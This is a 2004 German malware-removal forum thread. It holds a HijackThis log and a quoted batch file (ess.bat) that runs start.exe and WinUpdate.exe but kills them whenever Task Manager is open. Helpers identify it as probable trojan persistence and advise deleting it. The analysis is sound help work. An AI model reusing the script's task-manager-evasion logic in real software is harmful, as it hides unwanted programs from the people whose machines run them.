|
hi, nach dem booten des rechners beansprucht die cmd.exe bis zu 80 % der cpu-leistung. wenn ich den prozess im taskmanager kille dann ist alles wieder in ordnung. wodurch wird der prozess aufgerufen ? und was kann ich dagegen tun ? mit hijack this komm ich leider net weiter mangels fachwissen. könnt ihr mir sagen ob hier ein trojaner am werke ist ? als antivirenprog hab ich gdata antivirus am laufen... thx suicid71 Logfile of HijackThis v1.97.7 Scan saved at 20:04:15, on 11.05.2004 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe E:\AntiVirenKit InternetSecurity\AVK\AVKService.exe E:\AntiVirenKit InternetSecurity\AVK\AVKWCtl.exe C:\WINDOWS\System32\CTsvcCDA.exe C:\WINDOWS\System32\nvsvc32.exe C:\WINDOWS\SCARDS32.EXE C:\WINDOWS\System32\MsPMSPSv.exe C:\WINDOWS\Explorer.EXE C:\Programme\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe E:\CloneCD\CloneCDTray.exe E:\Daemon Tools\daemon.exe E:\Logitech\iTouch\iTouch.exe E:\Winamp\winampa.exe E:\Logitech\MouseWare\system\em_exec.exe C:\WINDOWS\System32\RUNDLL32.EXE C:\WINDOWS\System32\WF2K.EXE C:\Programme\Gemeinsame Dateien\G DATA\AVKMail\AVKPOP.EXE C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\CTHELPER.EXE C:\WINDOWS\System32\ctfmon.exe C:\WINDOWS\system32\ntvdm.exe E:\AntiVirenKit InternetSecurity\Webfilter\Webfilter.exe E:\Personal Backup 3\Persbackup.exe E:\ANTIVI~1\WEBFIL~1\ADSCLE~1.EXE C:\WINDOWS\update\start.exe C:\WINDOWS\System32\taskmgr.exe C:\Programme\Internet Explorer\iexplore.exe E:\!Router\2.1.4\imonc\Imonc.exe C:\Programme\Internet Explorer\iexplore.exe D:\Programme\HiJack This 1.97\HijackThis.exe O2 - BHO: Poly HTML Filter BHO - {0140DF95-9128-4053-AE72-F43F0CFCA062} - C:\WINDOWS\system32\SiKernel.dll O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - E:\Adobe\Acrobat 6.0\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: (no name) - {40FB69E1-9B7B-453F-B238-37D8E9528929} - E:\AntiVirenKit InternetSecurity\Webfilter\PAKIEPlugins.dll O2 - BHO: (no name) - {AE7CD045-E861-484f-8273-0445EE161910} - E:\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll O2 - BHO: Offliner AdFilter Helper - {DC9377A2-2E8D-44A1-99DB-F8A821DF254D} - C:\WINDOWS\system32\SiPlugins.dll O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O3 - Toolbar: (no name) - {ACB1E670-3217-45C4-A021-6B829A8A27CB} - (no file) O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file) O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - E:\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll O3 - Toolbar: WebFilter-Leiste - {75CD0BC5-E317-449C-9FF6-4986B3D48F64} - E:\ANTIVI~1\WEBFIL~1\PAKIEGUI.dll O4 - HKLM\..\Run: [CTSysVol] C:\Programme\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe /r O4 - HKLM\..\Run: [SBDrvDet] C:\Programme\Creative\SB Drive Det\SBDrvDet.exe /r O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [CloneCDElbyCDFL] "E:\CloneCD\ElbyCheck.exe" /L ElbyCDFL O4 - HKLM\..\Run: [CloneCDTray] "E:\CloneCD\CloneCDTray.exe" O4 - HKLM\..\Run: [DAEMON Tools-1033] "E:\Daemon Tools\daemon.exe" -lang 1033 -lock O4 - HKLM\..\Run: [zBrowser Launcher] E:\Logitech\iTouch\iTouch.exe O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe O4 - HKLM\..\Run: [WinampAgent] E:\Winamp\winampa.exe O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [WinFoxV2] C:\WINDOWS\System32\WF2K.EXE Initial O4 - HKLM\..\Run: [WinFast2KLoadDefault] rundll32.exe wf2kcpl.dll,DllLoadDefaultSettings O4 - HKLM\..\Run: [AVK Mail Checker] "C:\Programme\Gemeinsame Dateien\G DATA\AVKMail\AVKPOP.EXE" O4 - HKLM\..\Run: [CTHelper] CTHELPER.EXE O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe O4 - HKCU\..\Run: [update] C:\WINDOWS\update\hide C:\WINDOWS\update\ess.bat O4 - Startup: Persbackup.lnk = E:\Personal Backup 3\Persbackup.exe O8 - Extra context menu item: Add selected links to Link Container - E:\ANTIVI~1\WEBFIL~1\System\Scripts\off_collector_sel.htm O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Show domain links - E:\ANTIVI~1\WEBFIL~1\System\Scripts\off_domain_links.htm O9 - Extra button: Recherchieren (HKLM) O9 - Extra button: Yahoo! Messenger (HKLM) O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM) O16 - DPF: {0A5FD7C5-A45C-49FC-ADB5-9952547D5715} (Creative Software AutoUpdate) - http://www.creative.com/SU/ocx/12119/CTSUEng.cab O16 - DPF: {271A3CF5-5A54-447B-A08F-BE805F0DA60B} (DataDesign DDBAC Plug-In) - https://banking.seb.de/hbci/plugin/AXFOAM.CAB O16 - DPF: {3E68E405-C6DE-49FF-83AE-41EE9F4C36CE} (Office Update Installation Engine) - http://office.microsoft.com/officeup...ntent/opuc.cab O16 - DPF: {4E330863-6A11-11D0-BFD8-006097237877} (InstallFromTheWeb ActiveX Control) - http://tw.msi.com.tw/autobios/client/iftwclix.cab O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://bin.mcafee.com/molbin/shared/...1/mcinsctl.cab O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.co...070.3757407407 O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} - http://bin.mcafee.com/molbin/shared/...19/mcgdmgr.cab O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/pub...sh/swflash.cab O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://www.creative.com/SU/ocx/12119/CTPID.cab O17 - HKLM\System\CCS\Services\Tcpip\..\{C9D1872D-F958-4C68-BF01-293A7C2D97F0}: NameServer = 192.168.0.81 O17 - HKLM\System\CCS\Services\Tcpip\..\{F13613B1-728F-433A-8006-3E1FCB00888A}: NameServer = 192.168.0.81 |
hallo erstmal so zu deinem problem: </font><blockquote>Zitat:</font><hr /> wodurch wird der prozess aufgerufen ? und was kann ich dagegen tun ? </font>[/QUOTE]cmd.exe (früher command.com) ist die MS-DOS eingabeaufforderung von windows. wird entweder händisch aufgerufen oder durch dos scripte etwa in deinem log ist auch eins drin das bei jedem start aufgerufen wird </font><blockquote>Zitat:</font><hr /> O4 - HKCU\..\Run: [update] C:\WINDOWS\update\hide C:\WINDOWS\update\ess.bat</font>[/QUOTE]sind nochn paar andre sachen drin die eventuell nicht hingehoern dazu später.. umd das ding zu entfernen pc neustarten ->abgesicherter modus-> den eintrag fixen die datei löschen oder evtl erst mal ihren inhalt hier posten (rechtsklick bearbeiten)-> registry nahc der datei durchsuchen und evtl einträge löschen-> neustart dann müsste deien cmd.exe nicht emhr mit starten was genua as script nun macht kann ich dir noch nicht sagen google findet imho nichts brauchbares hab aber auch nicht alle 27 treffer durchgeschaut.. zu den anderen sachen: </font><blockquote>Zitat:</font><hr /> O2 - BHO: Poly HTML Filter BHO - {0140DF95-9128-4053-AE72-F43F0CFCA062} - C:\WINDOWS\system32\SiKernel.dll </font>[/QUOTE]google hits : 1 poste mal die eigenschaften der datei.. kenns nicht und google auch nicht und damit hatts in dem ordner eigentlich nicht viel verloren aber noch nicht fixen erst mal die eigensschaften posten </font><blockquote>Zitat:</font><hr />O3 - Toolbar: (no name) - {ACB1E670-3217-45C4-A021-6B829A8A27CB} - (no file) O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file) </font>[/QUOTE]uch die mal in der registry evtl findest dazu dann was sonst sehn die relativ überflüssig aus soweit Thomas |
</font><blockquote>Zitat:</font><hr />Original erstellt von suicide71: [QB]O4 - HKCU\..\Run: [update] C:\WINDOWS\update\hide C:\WINDOWS\update\ess.bat</font>[/QUOTE]Was steht denn in dieser ess.bat drin? ciao |
inhalt der ess.bat: @echo off cd "c:\WINDOWS\update" pv -f -k start.exe pv -f -k WinUpdate.exe if not %OS%==Windows_NT goto win9x set x=0 set n=0 :deb set k=0 pv -d 5000 for /f %%i in ('pv ^| find "taskmgr.exe"') do ( set k=1 ) if %k%==1 if %x%==1 ( pv -f -k start.exe pv -f -k WinUpdate.exe set n=0 pv -d 20000 ) if %k%==0 if %x%==0 ( start /b start.exe set n=1 ) set x=%n% goto deb ) :win9x start.exe was ist das ? zu winupdate hab ich nur was gefunden was auf nen trojaner schliessen lässt ..?? cu suicide71 |
Es ist wahrscheinlich ein Trojaner oder andere malware </font><blockquote>Zitat:</font><hr /> C:\WINDOWS\update\start.exe </font>[/QUOTE]hatte ich im log übersehn nu is aber ja klar wo die da herkommt entfern mal bitte die ess.bat und die beiden darin stehenden dateien wie oben beschrieben... das sollte - eigentlich - das problem beheben Nachtrag: Allerdings weiss ich nicht was die beiden exen anrichten insofern kanns sein das dein system bereits mit einigem mehr infiziert ist </font><blockquote>Zitat:</font><hr />Process File: winupdate or winupdate.exe Process Name: Winupdate Description: Added to the system as a result of the RADO VIRUS! which is a Backdoor Trojan Horse.It gives its creator unauthorized remote access to your computer. When the Trojan is executed for the first time, it displays a fake error message with the text, "Incompartible Windows Version. </font>[/QUOTE]das da oben ist eine möglichkeit allerdings gibt es genug verschiedene malware die dieselben namen benutzt. eventuell weiss ja jemand hier im forum mehr zu genau diesem einen [ 11. Mai 2004, 22:48: Beitrag editiert von: Olo ] |
Das ding ist warscheinlich eine datei, die von einem Virus / Wurm angelegt wurde, um sicherzugehen, dass dieser Virus / Wurm auch gestartet wird. Ich denke aber, dass es nicht funktionieren kann, da ein ) zu viel ist. kann aber auch ein irrtum sein... grüsse, Mario |
also, habe nun die dateien gelöscht und alles funtzt wieder super. besten dank für den schnellen support !!! |
Gut Ich glaube langsam auch das das script nicht richtig funktioniert hat und deshalb die cmd.exe so eine hohe auslastung hatte.. normalerweise müsste so ein script in weniger als einer sekunde durchlaufen auch der code ist an ein paar stellen sehr merkwürdig die sache mit der klammer zbsp die snooby ja schon erwähnt hat |
Ich habe bei mir gaerde das selbe Phenomän festgestellt (mit der Winupdate.exe). Mit dem Task Manager ließ sich das Programm nicht beenden, dann habe ich mal mit Prozess Explorer nachgeschaut und winupdate.exe wuzrde durch start.exe offengehalten. Nachden ich erst Start,exe gekickt habe und dann die Winupdate.exe hat es geklappt. So, mittlerweile weiß ich auch wozu diese Programme gehören: AI Roboform, ein Auto Ausfüllprogramm was als Beigabe zum Avant Browser dabei ist, Spybot 1.3 final hat diese 2 Dateien zumindest nicht als Sypware oder ähnliches angeprangert. |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 17:30 Uhr. |
Copyright ©2000-2025, Trojaner-Board